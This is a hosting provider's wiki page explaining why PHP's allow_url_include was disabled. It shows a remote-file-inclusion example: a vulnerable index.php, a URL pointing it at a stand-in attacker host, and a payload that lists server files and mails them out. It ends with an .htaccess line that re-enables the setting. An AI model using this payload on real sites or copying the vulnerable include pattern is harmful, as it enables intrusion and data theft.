Allow url include

From SonicWiki
Jump to: navigation, search

allow_url_include

For security reasons Sonic.net has disabled the ability to include remote files using the include() function in PHP. Although this was done to protect our users' data, some customers may need to make additional changes in order for their websites to work correctly.

1. Background and explanation

Before we made this change, it was possible to execute code like this on our servers:

<?php include("http://www.foo.com/bar.txt"); ?>

This would include the file "bar.txt" from the external host "www.foo.com" and anything inside that file would run as php code on a customer's website. The above example can be useful, but it can also be used to execute malicious code.

An example exploit:

Source code of the customer's index.php page:

<?php echo "<html>\n"; echo " <body>\n"; include("$go"); echo " </body>\n"; echo "</html>\n"; ?>

In cases like this, the URL can be modified to include an additional file:

http://www.mycoolsite.com/index.php?go=page1.php

The customer's index.php file would include the file page1.php, executing the PHP code and displaying its output on screen.

A more alarming example of this same exploit is listed below. In this case, the hacker executes the file by taking advantage of the customer's $go variable:

http://www.mycoolsite.com/index.php?go=http://www.evilhackersrock.net/commands.txt

commands.txt includes this code:

<?php

$site = system("hostname");

$files = system("find ./");

$output = $files; $output .= "\n\n";

mail("l337hax0r@evilhackersrock.net", "My Victim: $site", $output);

?>

So what happened here?

The hacker called his or her file via the customer's $go variable. The file contained commands to get the name of the server, and list all of the customer's files. Since the hacker now knows the names of all the customer's files, he or she can modify the commands.txt file to examine each file and look for the customer's password or other sensitive information.

Why are we doing this?

Hackers have used methods like this for sending spam, installing phishing sites, and other malicious acts for some time now. Popular software packages like Joomla, Gallery, phpBB and Wordpress have a history of being vulnerable to these kinds of attacks. One who installs these programs isn't warned of these vulnerabilities and ultimately pays the price. By making these changes, we are helping protect our customers and their data.

2. Work-around

If you are confident that you are using these functions in a responsible manner, you can re-enable this for your website. You will need to create a .htaccess file in your root web directory. In the .htaccess file add a line that looks like this:

php_flag allow_url_include on

There are other options you can set inside the .htaccess file. For more information please see our htaccess FAQ.